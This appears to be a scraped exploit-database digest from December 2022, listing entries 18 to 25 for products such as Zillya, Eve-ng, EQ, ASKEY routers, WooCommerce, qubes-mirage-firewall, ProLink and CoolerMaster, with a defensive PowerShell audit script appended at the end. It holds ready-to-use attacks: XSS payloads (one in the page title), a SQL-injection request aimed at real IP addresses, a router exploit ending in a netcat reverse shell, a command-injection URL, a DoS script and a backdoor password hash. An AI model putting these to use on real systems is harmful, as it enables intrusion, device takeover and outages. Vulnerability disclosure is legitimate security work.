<meta name="viewport" content="width=device-width,initial-scale=1,minimum-scale=1,maximum-scale=1,user-scalable=no,viewport-fit=cover">
<title>Title"><script>alert(1)</script></title>
<meta name="keywords" content="test1205">
[...]
```
18. # Exploit Title: Zillya Total Security 3.0.2367.0 - Local Privilege Escalation
# Date: 02.12.2022
# Author: M. Akil Gündoğan
# Contact: https://twitter.com/akilgundogan
# Vendor Homepage: https://zillya.com/
# Software Link: (https://download.zillya.com/ZTS3.exe) / (https://download.zillya.com/ZIS3.exe)
# Version: IS (3.0.2367.0) / TS (3.0.2368.0)
# Tested on: Windows 10 Professional x64
# PoC Video: https://youtu.be/vRCZR1kd89Q

Vulnerability Description:
---------------------------------------
Zillya's processes run with SYSTEM privileges. A user with low privileges on the system can copy any file they want to any location by using the quarantine module in Zillya. This is an example of the AVGater vulnerabilities that are often found in antivirus programs. You can read the article about AVGater vulnerabilities here: https://bogner.sh/2017/11/avgater-getting-local-admin-by-abusing-the-anti-virus-quarantine/

The vulnerability affects both "Zillya Total Security" and "Zillya Internet Security" products.

Step by step reproduce:
---------------------------------------
1 - The attacker creates a new folder and puts a malicious file into it. It can be a DLL or any file.
2 - The attacker waits for "Zillya Total Security" or "Zillya Internet Security" to quarantine it.
3 - The created folder is linked with the Google Symbolic Link Tools "Create Mount Point" tool to a folder that the current user does not have write permission to. You can find these tools here: https://github.com/googleprojectzero/symboliclink-testing-tools
4 - Restore the quarantined file. When checked, it is seen that the file has been moved to an unauthorized location. This is evidence of the escalation vulnerability. An attacker with an unauthorized user can write to directories that require authorization. Using techniques such as DLL hijacking, they can gain SYSTEM privileges.

Advisories:
---------------------------------------
Developers should not allow unauthorized users to restore from quarantine unless necessary. Also, it should be checked whether the target file has been copied to the original location. Unless necessary, users should not be able to interfere with processes running with SYSTEM privileges. All processes on the user's side should be run with normal privileges.

Disclosure Timeline:
---------------------------------------
13.11.2022 - Vulnerability reported via email, but no response was given and no fix was released.
02.12.2022 - Full disclosure.
19. # Exploit Title: Eve-ng 5.0.1-13 - Stored Cross-Site Scripting (XSS)
# Google Dork: N/A
# Date: 12/6/2022
# Exploit Author: @casp3r0x0 hassan ali al-khafaji
# Vendor Homepage: https://www.eve-ng.net/
# Software Link: https://www.eve-ng.net/index.php/download/
# Version: Free EVE Community Edition Version 5.0.1-13
# Tested on: Free EVE Community Edition Version 5.0.1-13
# CVE : N/A

#we could achieve stored XSS on eve-ng free, I don't know if this affects the pro version also
#first create a new lab
#second create a Text label
#insert the xss payload and click save
"><script>alert(1)</script>
#the application is multi user; if any user opens the lab the xss will be triggered.
20. Exploit Title: EQ Enterprise management system v2.2.0 - SQL Injection
Date: 2022.12.7
Exploit Author: TLF
Vendor Homepage: https://www.yiquantech.com/pc/about.html
Software Link (download links for the affected applications): http://121.8.146.131/, http://183.233.152.14:9000/, http://219.135.168.90:9527/, http://222.77.5.250:9000/, http://219.135.168.90:9530/
Version: EQ v1.5.31 to v2.2.0
Tested on: windows 10
CVE : CVE-2022-45297

POC:
```http
POST /Account/Login HTTP/1.1
Host: 121.8.146.131
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Content-Length: 118
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Cookie: ASP.NET_SessionId=tlipmh0zjgfdm5b4h1tgvolg
Origin: http://121.8.146.131
Referer: http://121.8.146.131/Account/Login
X-Requested-With: XMLHttpRequest
Accept-Encoding: gzip

RememberPwd=false&ServerDB=EQ%27and%28select%2B1%29%3E0waitfor%2F%2A%2A%2Fdelay%270%3A0%3A0&UserNumber=%27&UserPwd=%27
```
21. # Exploit Title: ASKEY RTF3505VW-N1 - Privilege escalation
# Date: 07-12-2022
# Exploit Author: Leonardo Nicolas Servalli
# Vendor Homepage: www.askey.com
# Platform: ASKEY router devices RTF3505VW-N1
# Tested on: Firmware BR_SV_g000_R3505VMN1001_s32_7
# Vulnerability analysis: https://github.com/leoservalli/Privilege-escalation-ASKEY/blob/main/README.md

#Description:
#----------
# Mitrastar ASKEY RTF3505VW-N1 devices are provided with access through ssh into a restricted default shell (credentials are on the back of the router and in some cases these routers use default credentials).
# The command "tcpdump" is present in the restricted shell and does not handle the -z flag correctly, so it can be used to escalate privileges through the creation of a local file in the /tmp directory of the router, by injecting packets through port 80 (used for the router's Web GUI) with the string ";/bin/bash" in order to be executed by "-z sh". By using ";/bin/bash" as the injected string we can spawn a busybox/ash console.

#Exploit:
#--------
```bash
#!/usr/bin/bash
if [ $# -ne 5 ]; then
    echo "Command example: $0 routerIP routerUser routerPassword remoteIPshell remotePortShell "
    exit 0
fi

for K in $(seq 1 15)   # Attempts
do
    echo "**************************************************************************************"
    echo "******************************** Attempt number $K ************************************"
    echo "**************************************************************************************"

    # start a background loop injecting the string ";/bin/bash" on port 80 of the router
    for l in $(seq 1 200) ; do echo ";/bin/bash" | nc -p 8888 $1 80 ; done > /dev/null 2>&1 &

    # Expect script to interact with the router through SSH, login, launch tcpdump with the option "-z sh",
    # and finally launch a more stable busybox reverse shell to our listener
    /usr/bin/expect << EOD
    spawn ssh $2@$1
    expect {
        "password: " {
            send "$3\r"
            expect ">"
            send -- "tcpdump -v -ln -i any -w /tmp/runme$K -W 1 -G 1 -z sh src port 8888\r"   ;# filter by source port 8888
        }
        "yes/no" {
            send "yes\r"
            #exp_continue
        }
    }
    set timeout 2
    expect {
        timeout {
            puts "Timeout..."
            send "exit\r"
            exit 0
        }
        "*usy*ox" {
            expect "#"
            send "rm /tmp/runme* \r"
            send "rm -f /tmp/f;mknod /tmp/f p;cat /tmp/f | /bin/sh -i 2>&1|nc $4 $5 >/tmp/f \r"
            puts "Rooted !!!!!!!!!"
            set timeout -1
            expect "NEVER_APPEARING_STRING#"   ;# wait an infinite time to maintain the reverse shell open
        }
    }
EOD
done
```
22. # Title: Wordpress Plugin WooCommerce v7.1.0 - Remote Code Execution(RCE)
# Date: 2022-12-07
# Author: Milad Karimi
# Vendor Homepage: https://wordpress.org/plugins/woocommerce
# Software Link: https://wordpress.org/plugins/woocommerce
# Tested on: windows 10 , firefox
# Version: 7.1.0
# CVE : N/A

# Description:
simple, easy to use jQuery frontend to php backend that pings various devices and changes colors from green to red depending on if device is up or down.

# PoC :
http://localhost/woocommerce/includes/admin/meta-boxes/class-wc-meta-box-product-images.php?product-type=;echo '<?php phpinfo(); ?>' >info.php

# Vulnerable code:
95: $classname $classname($post_id);
94: $classname = WC_Product_Factory::get_product_classname($post_id, $product_type : 'simple');
92: ⇓ function save($post_id, $post)
93: $product_type = WC_Product_Factory::get_product_type($post_id) : sanitize_title(stripslashes($_POST['product-type']));
92: ⇓ function save($post_id, $post)
23. # Exploit Title: qubes-mirage-firewall v0.8.3 - Denial Of Service (DoS)
# Date: 2022-12-04
# Exploit Author: Krzysztof Burghardt <krzysztof@burghardt.pl>
# Vendor Homepage: https://mirage.io/blog/MSA03
# Software Link: https://github.com/mirage/qubes-mirage-firewall/releases
# Version: >= 0.8.0 & < 0.8.4
# Tested on: Qubes OS
# CVE: CVE-2022-46770

#PoC exploit from https://github.com/mirage/qubes-mirage-firewall/issues/166
```python
#!/usr/bin/env python3
from socket import socket, AF_INET, SOCK_DGRAM

# mDNS multicast group and port; a 607-byte UDP payload is enough to trigger the crash
TARGET = "239.255.255.250"
PORT = 5353
PAYLOAD = b'a' * 607

s = socket(AF_INET, SOCK_DGRAM)
s.sendto(PAYLOAD, (TARGET, PORT))
```
24. # Exploit Title: Router backdoor - ProLink PRS1841 PLDT Home fiber
# Date: 12/8/2022
# Exploit Author: Lawrence Amer @zux0x3a
# Vendor Homepage: https://prolink2u.com/product/prs1841/
# Firmware : PRS1841 U V2
# research: https://0xsp.com/security%20research%20%20development%20srd/backdoor-discovered-in-pldt-home-fiber-routers/

Description
========================
A silent privileged backdoor account was discovered on the Prolink PRS1841 routers; it allows attackers to gain command execution privileges on the router OS. The vulnerable account issued by the vendor was identified as "adsl", with "realtek" as the default password; attackers could use this account to access the router remotely/internally using either the Telnet or FTP protocol.

PoC
=============================
```
adsl:$1$$m9g7v7tSyWPyjvelclu6D1:0:0::/tmp:/bin/cli
```
25. # Exploit Title: CoolerMaster MasterPlus 1.8.5 - 'MPService' Unquoted Service Path
# Date: 11/17/2022
# Exploit Author: Damian Semon Jr (Blue Team Alpha)
# Version: 1.8.5
# Vendor Homepage: https://masterplus.coolermaster.com/
# Software Link: https://masterplus.coolermaster.com/
# Tested on: Windows 10 x64

# Step to discover the unquoted service path:
```
wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "c:\windows\\" | findstr /i /v """

CoolerMaster MasterPlus Technology Service  MPService  C:\Program Files (x86)\CoolerMaster\MasterPlus\MPService.exe  Auto
```

# Info on the service:
```
C:\>sc qc MPService
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: MPService
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Program Files (x86)\CoolerMaster\MasterPlus\MPService.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : CoolerMaster MasterPlus Technology Service
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem
```

#Exploit:
A successful exploit of this vulnerability could allow a threat actor to execute code during startup or reboot with System privileges. Drop payload "Program.exe" in C:\ and restart the service or computer to trigger. Ex: (C:\Program.exe)
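As an added defensive check that is not part of the advisory above: the PowerShell audit below (function names are my own) lists auto-start services whose binary path is unquoted and contains a space, mirroring the wmic filter in the post, and can write the quoted path back to the service's ImagePath registry value, which is the remediation for this class of issue.

```powershell
# Added example, not from the advisory: audit auto-start services for unquoted
# binary paths that contain spaces, and optionally quote them in the registry.
function Get-UnquotedServicePath {
    # Filter: auto-start, path not already quoted, not under the Windows directory
    # (as the wmic filter in the post does), and containing whitespace somewhere.
    Get-CimInstance -ClassName Win32_Service |
        Where-Object {
            $_.StartMode -eq 'Auto' -and
            $_.PathName -and
            $_.PathName -notlike '"*' -and
            $_.PathName -notmatch '^[A-Za-z]:\\Windows\\' -and
            $_.PathName -match '\s'
        } |
        ForEach-Object {
            # Split the executable from any arguments: everything up to the first ".exe"
            if ($_.PathName -match '^(?<exe>.*?\.exe)(?<tail>\s.*)?$') {
                [pscustomobject]@{
                    Name      = $_.Name
                    PathName  = $_.PathName
                    # Quoted form, e.g. "C:\Program Files (x86)\...\MPService.exe" plus any arguments
                    FixedPath = '"' + $Matches['exe'] + '"' + $Matches['tail']
                }
            }
        }
}

function Repair-UnquotedServicePath {
    # Writes the quoted path to the service's ImagePath value; honours -WhatIf / -Confirm.
    [CmdletBinding(SupportsShouldProcess)]
    param([Parameter(Mandatory, ValueFromPipeline)] [pscustomobject] $Service)
    process {
        $key = "HKLM:\SYSTEM\CurrentControlSet\Services\$($Service.Name)"
        if ($PSCmdlet.ShouldProcess($Service.Name, "set ImagePath to $($Service.FixedPath)")) {
            Set-ItemProperty -Path $key -Name ImagePath -Value $Service.FixedPath
        }
    }
}

# Report first; drop -WhatIf and run from an elevated prompt to apply the fix.
Get-UnquotedServicePath | Format-Table -AutoSize
Get-UnquotedServicePath | Repair-UnquotedServicePath -WhatIf
```

On a host with MasterPlus installed, the report line for MPService should show the same unquoted path as the `sc qc` output above and a FixedPath wrapped in double quotes.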
